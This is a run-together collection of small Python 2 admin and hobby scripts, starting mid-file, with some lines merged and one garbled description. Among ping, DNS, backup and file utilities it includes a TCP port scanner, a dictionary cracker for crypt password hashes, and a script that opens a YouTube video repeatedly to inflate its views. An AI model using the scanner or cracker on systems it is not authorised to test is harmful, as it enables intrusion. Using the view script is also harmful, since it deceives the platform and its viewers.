filename, "ran at", strftime("%Y-%m-%d %H:%M:%S"), "on",platform.node(), "run from",os.getcwd())
print_docs() # Call the print_docs function
putty_sessions() # Call the putty_session function
rdp_sessions() # Call the rdp_sessions function
euroclear_docs() # Call the euroclear_docs function
if __name__ == "__main__":
main()
import serial
import sys
#A serial port-scanner for linux and windows platforms
#Author: Julio César Echeverri Marulanda
#e-mail: julio.em7@gmail.com
#blog: blogdelingeniero1.wordpress.com
#You should have installed the PySerial module to use this method.
#You can install pyserial with the following line: pip install pyserial
def ListAvailablePorts():
#This function return a list containing the string names for Virtual Serial Ports
#availables in the computer (this function works only for Windows & Linux Platforms but you can extend it)
#if there isn't available ports, returns an empty List
AvailablePorts = []
platform = sys.platform
if platform == 'win32':
for i in range(255):
try:
ser = serial.Serial(i,9600)
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append(ser.portstr)
ser.close()
elif platform == 'linux':
for i in range(0,255):
try:
ser = serial.Serial('/dev/ttyUSB'+str(i))
except serial.serialutil.SerialException:
pass
else:
AvailablePorts.append('/dev/ttyUSB'+str(i))
ser.close()
else:
print '''This method was developed only for linux and windows
the current platform isn't recognised'''
return AvailablePorts
# EXAMPLE OF HOW IT WORKS
# if an Arduino is connected to the computer, the port will be show in the terminal
# print ListAvailablePorts()# Script Name : nslookup_check.py
# Author : Craig Richards
# Created : 5th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This very simple script opens the file server_list.txt and the does an nslookup for each one to check the DNS entry
import subprocess # Import the subprocess module
for server in open('server_list.txt'): # Open the file and read each line
subprocess.Popen(('nslookup ' + server)) # Run the nslookup command for each server in the listimport pprint
info = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
count = {}
for character in info.upper():
count[character] = count.get(character, 0) + 1
value = pprint.pformat(count)
print(value)# Script Name : get_info_remoute_srv.py
# Author : Pavel Sirotkin
# Created : 3th April 2016
# Last Modified : -
# Version : 1.0.0
# Modifications :
# Description : this will get info about remoute server on linux through ssh connection. Connect these servers must be through keys
import subprocess
HOSTS = ('proxy1', 'proxy')
COMMANDS = ('uname -a', 'uptime')
for host in HOSTS:
result = []
for command in COMMANDS:
ssh = subprocess.Popen(["ssh", "%s" % host, command],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result.append(ssh.stdout.readlines())
print('--------------- ' + host + ' --------------- ')
for res in result:
if not res:
print(ssh.stderr.readlines())
break
else:
print(res)# Script Name : portscanner.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Port Scanner, you just pass the host and the ports
import optparse # Import the module
from socket import * # Import the module
from threading import * # Import the module
screenLock = Semaphore(value=1) # Prevent other threads from preceeding
def connScan(tgtHost, tgtPort): # Start of the function
try:
connSkt = socket(AF_INET, SOCK_STREAM) # Open a socket
connSkt.connect((tgtHost, tgtPort))
connSkt.send('')
results=connSkt.recv(100)
screenLock.acquire() # Acquire the lock
print '[+] %d/tcp open'% tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-] %d/tcp closed '% tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts): # Start of the function
try:
tgtIP = gethostbyname(tgtHost) # Get the IP from the hostname
except:
print "[-] Cannot resolve '%s': Unknown host"%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP) # Get hostname from IP
print '\n[+] Scan Results for: ' +tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts: # Scan host and ports
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog -H'+' <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort',type='string', help='specify target port[s] seperated by a comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()# Script Name : work_connect.py
# Author : Craig Richards
# Created : 11th May 2012
# Last Modified : 31st October 2012
# Version : 1.1
# Modifications : 1.1 - CR - Added some extra code, to check an argument is passed to the script first of all, then check it's a valid input
# Description : This simple script loads everything I need to connect to work etc
import subprocess # Load the Library Module
import sys # Load the Library Module
import os # Load the Library Module
import time # Load the Library Module
dropbox = os.getenv("dropbox") # Set the variable dropbox, by getting the values of the environment setting for dropbox
rdpfile = ("remote\\workpc.rdp") # Set the variable logfile, using the arguments passed to create the logfile
conffilename=os.path.join(dropbox, rdpfile) # Set the variable conffilename by joining confdir and conffile together
remote = (r"c:\windows\system32\mstsc.exe ") # Set the variable remote with the path to mstsc
text = '''You need to pass an argument
-c Followed by login password to connect
-d to disconnect''' # Text to display if there is no argument passed or it's an invalid option - 1.2
if len(sys.argv) < 2: # Check there is at least one option passed to the script - 1.2
print text # If not print the text above - 1.2
sys.exit() # Exit the program - 1.2
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print text # Print the text, stored in the text variable - 1.2
sys.exit(0) # Exit the program
else:
if sys.argv[1].lower().startswith('-c'): # If the first argument is -c then
passwd = sys.argv[2] # Set the variable passwd as the second argument passed, in this case my login password
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe connect -u username -p "+passwd))
subprocess.Popen((r"c:\geektools\puttycm.exe"))
time.sleep(15) # Sleep for 15 seconds, so the checkpoint software can connect before opening mstsc
subprocess.Popen([remote, conffilename])
elif sys.argv[1].lower().startswith('-d'): # If the first argument is -d then disconnect my checkpoint session.
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe disconnect "))
else:
print 'Unknown option - ' + text # If any other option is passed, then print Unknown option and the text from above - 1.2# Script Name : testlines.py
# Author : Craig Richards
# Created : 08th December 2011
# Last Modified :
# Version : 1.0
# Modifications : beven nyamande
# Description : This very simple script open a file and prints out 100 lines of whatever is set for the line variableest you want to print\n" # This sets the variable for the text that you want to print
def write_to_file(filename, txt):
with open(filename, 'w') as file_object:
s = file_object.write(txt)
if __name__ == '__main__':
write_to_file('test.txt', 'I am beven')
# Script Name : ping_subnet.py
# Author : Craig Richards
# Created : 12th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : After supplying the first 3 octets it will scan the final range for available addresses
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
filename = sys.argv[0] # Sets a variable for the script name
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the first octets of the address Usage : ''' + filename + ''' 111.111.111 '''
sys.exit(0)
else:
if (len(sys.argv) < 2): # If no arguments are passed then display the help and instructions on how to run the script
sys.exit (' You need to supply the first octets of the address Usage : ' + filename + ' 111.111.111')
subnet = sys.argv[1] # Set the variable subnet as the three octets you pass it
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
f = open('ping_'+subnet+'.log', 'w') # Open a logfile
for ip in range(2,255): # Set the ip variable for the range of numbers
ret = subprocess.call(myping + str(subnet)+"."+str(ip) , shell=True,stdout=f,stderr=subprocess.STDOUT) # Run the command pinging the servers
if ret == 0: # Depending on the response
f.write (subnet+"."+str(ip) + " is alive" + "\n") # Write out that you can receive a reponse
else:
f.write (subnet+"."+str(ip) + " did not respond" + "\n") # Write out you can't reach the box# Script Name : ping_servers.py
# Author : Craig Richards
# Created : 9th May 2012
# Last Modified : 14th May 2012
# Version : 1.1
# Modifications : 1.1 - 14th May 2012 - CR Changed it to use the config directory to store the server files
# Description : This script will, depending on the arguments supplied will ping the servers associated with that application group.
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the application group for the servers you want to ping, i.e.
dms
swaps
Followed by the site i.e.
155
bromley'''
sys.exit(0)
else:
if (len(sys.argv) < 3): # If no arguments are passed,display the help/instructions on how to run the script
sys.exit ('\nYou need to supply the app group. Usage : ' + filename + ' followed by the application group i.e. \n \t dms or \n \t swaps \n then the site i.e. \n \t 155 or \n \t bromley')
appgroup = sys.argv[1] # Set the variable appgroup as the first argument you supply
site = sys.argv[2] # Set the variable site as the second argument you supply
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
if 'dms' in sys.argv: # If the argument passed is dms then
appgroup = 'dms' # Set the variable appgroup to dms
elif 'swaps' in sys.argv: # Else if the argment passed is swaps then
appgroup = 'swaps' # Set the variable appgroup to swaps
if '155' in sys.argv: # If the argument passed is 155 then
site = '155' # Set the variable site to 155
elif 'bromley' in sys.argv: # Else if the argument passed is bromley
site = 'bromley' # Set the variable site to bromley
filename = sys.argv[0] # Sets a variable for the script name
logdir = os.getenv("logs") # Set the variable logdir by getting the OS environment logs
logfile = 'ping_'+appgroup+'_'+site+'.log' # Set the variable logfile, using the arguments passed to create the logfile
logfilename=os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.2
conffile = (appgroup+'_servers_'+site+'.txt') # Set the variable conffile - 1.2
conffilename=os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.2
f = open(logfilename, "w") # Open a logfile to write out the output
for server in open(conffilename): # Open the config file and read each line - 1.2
ret = subprocess.call(myping + server, shell=True,stdout=f,stderr=subprocess.STDOUT) # Run the ping command for each server in the list.
if ret == 0: # Depending on the response
f.write (server.strip() + " is alive" + "\n") # Write out that you can receive a reponse
else:
f.write (server.strip() + " did not respond" + "\n") # Write out you can't reach the box
print ("\n\tYou can see the results in the logfile : "+ logfilename); # Show the location of the logfile# Script Name : backup_automater_services.py
# Author : Craig Richards
# Created : 24th October 2012
# Last Modified : 13th February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up the comments and syntax
# Description : This will go through and backup all my automator services workflows
import datetime # Load the library module
import os # Load the library module
import shutil # Load the library module
today = datetime.date.today() # Get Today's date
todaystr = today.isoformat() # Format it so we can use the format to create the directory
confdir = os.getenv("my_config") # Set the variable by getting the value from the OS setting
dropbox = os.getenv("dropbox") # Set the variable by getting the value from the OS setting
conffile = ('services.conf') # Set the variable as the name of the configuration file
conffilename = os.path.join(confdir, conffile) # Set the variable by combining the path and the file name
sourcedir = os.path.expanduser('~/Library/Services/') # Source directory of where the scripts are located
destdir = os.path.join(dropbox, "My_backups" + "/" +
"Automater_services" + todaystr + "/") # Combine several settings to create
# the destination backup directory
for file_name in open(conffilename): # Walk through the configuration file
fname = file_name.strip() # Strip out the blank lines from the configuration file
if fname: # For the lines that are not blank
sourcefile = os.path.join(sourcedir, fname) # Get the name of the source files to backup
destfile = os.path.join(destdir, fname) # Get the name of the destination file names
shutil.copytree(sourcefile, destfile) # Copy the directories# Script Name : powerup_checks.py
# Author : Craig Richards
# Created : 25th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Creates an output file by pulling all the servers for the given site from SQLITE database, then goes through the list pinging the servers to see if they are up on the network
import sys # Load the Library Module
import sqlite3 # Load the Library Module
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
dropbox=os.getenv("dropbox") # Set the variable, by getting the value of the variable from the OS
config=os.getenv("my_config") # Set the variable, by getting the value of the variable from the OS
dbfile=("Databases/jarvis.db") # Set the variable to the database
master_db=os.path.join(dropbox, dbfile) # Create the variable by linking the path and the file
listfile=("startup_list.txt") # File that will hold the servers
serverfile=os.path.join(config,listfile) # Create the variable by linking the path and the file
outputfile=('server_startup_'+strftime("%Y-%m-%d-%H-%M")+'.log')
# Below is the help text
text = '''
You need to pass an argument, the options the script expects is
-site1 For the Servers relating to site1
-site2 For the Servers located in site2'''
def windows(): # This is the function to run if it detects the OS is windows.
f = open(outputfile, 'a') # Open the logfile
for server in open(serverfile,'r'): # Read the list of servers from the list
#ret = subprocess.call("ping -n 3 %s" % server.strip(), shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
ret = subprocess.call("ping -n 3 %s" % server.strip(),stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def linux(): # This is the function to run if it detects the OS is nix.
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open(serverfile,'r'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def get_servers(query): # Function to get the servers from the database
conn = sqlite3.connect(master_db) # Connect to the database
cursor = conn.cursor() # Create the cursor
cursor.execute('select hostname from tp_servers where location =?',(query,)) # SQL Statement
print ('\nDisplaying Servers for : ' + query + '\n')
while True: # While there are results
row = cursor.fetchone() # Return the results
if row == None:
break
f = open(serverfile, 'a') # Open the serverfile
f.write("%s\n" % str(row[0])) # Write the server out to the file
print row[0] # Display the server to the screen
f.close() # Close the file
def main(): # Main Function
if os.path.exists(serverfile): # Checks to see if there is an existing server file
os.remove(serverfile) # If so remove it
if len(sys.argv) < 2: # Check there is an argument being passed
print text # Display the help text if there isn't one passed
sys.exit() # Exit the script
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # If the ask for help
print text # Display the help text if there isn't one passed
sys.exit(0) # Exit the script after displaying help
else:
if sys.argv[1].lower().startswith('-site1'): # If the argument is site1
query = 'site1' # Set the variable to have the value site
elif sys.argv[1].lower().startswith('-site2'): # Else if the variable is bromley
query = 'site2' # Set the variable to have the value bromley
else:
print '\n[-] Unknown option [-] ' + text # If an unknown option is passed, let the user know
sys.exit(0)
get_servers(query) # Call the get servers funtion, with the value from the argument
if os.name == "posix": # If the OS is linux.
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows function
print ('\n[+] Check the log file ' + outputfile + ' [+]\n') # Display the name of the log
if __name__ == '__main__':
main() # Call the main function# Script Name : password_cracker.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Old school password cracker using python
from sys import platform as _platform
# Check the current operating system to import the correct version of crypt
if _platform == "linux" or _platform == "linux2":
import crypt # Import the module
elif _platform == "darwin":
# Mac OS X
import crypt
elif _platform == "win32":
# Windows
try:
import fcrypt # Try importing the fcrypt module
except ImportError:
print 'Please install fcrypt if you are on Windows'
def testPass(cryptPass): # Start the function
salt = cryptPass[0:2]
dictFile=open('dictionary.txt','r') # Open the dictionary file
for word in dictFile.readlines(): # Scan through the file
word=word.strip('\n')
cryptWord=crypt.crypt(word,salt) # Check for password in the file
if (cryptWord == cryptPass):
print "[+] Found Password: "+word+"\n"
return
print "[-] Password Not Found.\n"
return
def main():
passFile = open('passwords.txt') # Open the password file
for line in passFile.readlines(): # Read through the file
if ":" in line:
user=line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ') # Prepare the user name etc
print "[*] Cracking Password For: "+user
testPass(cryptPass) # Call it to crack the users password
if __name__ == "__main__":
main()# Script Name : check_file.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications : with statement added to ensure correct file closure
# Description : Check a file exists and that we can read the file
from __future__ import print_function
import sys # Import the Modules
import os # Import the Modules
# Prints usage if not appropriate length of arguments are provided
def usage():
print('[-] Usage: python check_file.py <filename1> [filename2] ... [filenameN]')
exit(0)
# Readfile Functions which open the file that is passed to the script
def readfile(filename):
with open(filename, 'r') as f: # Ensure file is correctly closed under all circumstances
line = f.read()
print(line)
def main():
if len(sys.argv) >= 2: # Check the arguments passed to the script
filenames = sys.argv[1:]
for filename in filenames: # Iterate for each filename passed in command line argument
if not os.path.isfile(filename): # Check the File exists
print ('[-] ' + filename + ' does not exist.')
filenames.remove(filename) #remove non existing files from filenames list
continue
if not os.access(filename, os.R_OK): # Check you can read the file
print ('[-] ' + filename + ' access denied')
filenames.remove(filename) # remove non readable filenames
continue
else:
usage() # Print usage if not all parameters passed/Checked
# Read the content of each file
for filename in filenames:
print ('[+] Reading from : ' + filename) # Display Message and read the file contents
readfile(filename)
if __name__ == '__main__':
main()
# Script Name : nmap_scan.py
# Author : Craig Richards
# Created : 24th May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This scans my scripts directory and gives a count of the different types of scripts, you need nmap installed to run this
import nmap # Import the module
import optparse # Import the module
def nmapScan(tgtHost, tgtPort): # Create the function, this fucntion does the scanning
nmScan = nmap.PortScanner()
nmScan.scan(tgtHost, tgtPort)
state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def main(): # Main Program
parser = optparse.OptionParser('usage%prog ' + '-H <host> -p <port>') # Display options/help if required
parser.add_option('-H', dest='tgtHost', type='string', help='specify host')
parser.add_option('-p', dest='tgtPort', type='string', help='port')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
for tgtPort in tgtPorts: # Scan the hosts with the ports etc
nmapScan(tgtHost, tgtPort)
if __name__ == '__main__':
main()
import urllib2
try:
urllib2.urlopen("http://google.com", timeout=2)
print ("working connection")
except urllib2.URLError:
print ("No internet connection")# Script Name : sqlite_check.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
dropbox= os.getenv("dropbox")
dbfile=("Databases\jarvis.db")
master_db=os.path.join(dropbox, dbfile)
con = None
try:
con = lite.connect(master_db)
cur = con.cursor()
cur.execute('SELECT SQLITE_VERSION()')
data = cur.fetchone()
print "SQLite version: %s" % data
except lite.Error, e:
print "Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
print row
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
row = cur.fetchone()
if row == None:
break
print row[0]# Script Name : fileinfo.py
# Author : Not sure where I got this from
# Created : 28th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Show file information for a given file
# get file information using os.stat()
# tested with Python24 vegsaeat 25sep2006
from __future__ import print_function
import os
import sys
import stat # index constants for os.stat()
import time
try_count = 16
while try_count:
file_name = raw_input("Enter a file name: ") # pick a file you have
try_count >>= 1
try:
file_stats = os.stat(file_name)
break
except OSError:
print ("\nNameError : [%s] No such file or directory\n", file_name)
if try_count == 0:
print ("Trial limit exceded \nExiting program")
sys.exit()
# create a dictionary to hold file info
file_info = {
'fname': file_name,
'fsize': file_stats[stat.ST_SIZE],
'f_lm': time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_MTIME])),
'f_la': time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_ATIME])),
'f_ct': time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_CTIME]))
}
print
print ("file name = %(fname)s", file_info)
print ("file size = %(fsize)s bytes", file_info)
print ("last modified = %(f_lm)s", file_info)
print ("last accessed = %(f_la)s", file_info)
print ("creation time = %(f_ct)s", file_info)
print
if stat.S_ISDIR(file_stats[stat.ST_MODE]):
print ("This a directory")
else:
print ("This is not a directory")
print ()
print ("A closer look at the os.stat(%s) tuple:" % file_name)
print (file_stats)
print ()
print ("The above tuple has the following sequence:")
print ("""st_mode (protection bits), st_ino (inode number),
st_dev (device), st_nlink (number of hard links),
st_uid (user ID of owner), st_gid (group ID of owner),
st_size (file size, bytes), st_atime (last access time, seconds since epoch),
st_mtime (last modification time), st_ctime (time of creation, Windows)"""
)# Script Name : dir_test.py
# Author : Craig Richards
# Created : 29th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Tests to see if the directory testdir exists, if not it will create the directory for you
import os # Import the OS module
if not os.path.exists('testdir'): # Check to see if it exists
os.makedirs('testdir') # Create the directoryimport time
import webbrowser
#how much views you want
#This only works when video has less than 300 views, it won't work when there are more than 300 views...
#due to youtube's policy.
print("Enjoy your Time\n" + time.ctime())
for count in range(30):
time.sleep(5)
webbrowser.open("https://www.youtube.com/watch?v=o6A7nf3IeeA")# batch_file_rename.py
# Created: 6th August 2012
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
__author__ = 'Craig Richards'
__version__ = '1.0'
import os
import sys
def batch_rename(work_dir, old_ext, new_ext):
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
# files = os.listdir(work_dir)
for filename in os.listdir(work_dir):
# Get the file extension
file_ext = os.path.splitext(filename)[1]
# Start of the logic to check the file extensions, if old_ext = file_ext
if old_ext == file_ext:
# Set newfile to be the filename, replaced with the new extension
newfile = filename.replace(old_ext, new_ext)
# Write the files
os.rename(
os.path.join(work_dir, filename),
os.path.join(work_dir, newfile)
)
def main():
'''
This will be called if the script is directly invoked.
'''
# Set the variable work_dir with the first argument passed
work_dir = sys.argv[1]
